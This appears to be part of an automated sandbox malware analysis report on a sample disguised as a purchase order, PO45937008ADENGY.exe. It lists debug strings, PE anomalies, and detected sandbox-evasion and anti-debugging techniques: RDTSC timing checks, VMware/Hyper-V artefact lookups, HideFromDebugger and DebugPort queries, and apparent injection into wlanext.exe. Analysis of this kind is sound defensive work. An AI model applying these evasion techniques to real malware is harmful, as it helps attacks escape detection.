          Source: Binary string: wgdi32full.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: clrjit.pdbR source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: Windows.Storage.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp
          Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: rasman.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: dhcpcsvc.pdbg source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.Xml.pdb source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: powrprof.pdbT source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdb? source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbJ source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\Desktop\PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: wlanext.pdbGCTL source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
          Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: edputil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: PO45937008ADENGY.exeStatic PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
          Source: PO45937008ADENGY.exeStatic PE information: real checksum: 0x16e14 should be: 0x29ee9
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 0_2_015BF138 pushad ; retf
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0041620A pushad ; iretd
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_004152CC push ds; retf
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_004154BD push fs; iretd
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_00415569 push edx; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_004155C6 push edx; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0137D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0397D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE52CC push ds; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE620A pushad ; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EEB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE54BD push fs; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EEB46C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EEB40B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EEB402 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE55C6 push edx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE5569 push edx; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000002ED85E4 second address: 0000000002ED85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000002ED897E second address: 0000000002ED8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6572Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 6996Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: explorer.exe, 0000000C.00000000.694685314.000000000A64D000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&~
          Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000C.00000000.694504401.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.688629352.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.694504401.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: WerFault.exe, 0000000D.00000002.708068526.0000000004C20000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWT
          Source: WerFault.exe, 0000000D.00000002.706779671.00000000011C8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000C.00000000.678387989.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000C.00000000.695029841.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000C.00000000.695297313.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess information queried: ProcessInformation

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01344120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01344120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01344120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01344120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01344120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01329100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01329100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01329100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01340050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01340050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135F0BF mov eax, dword ptr fs:[00000030h]
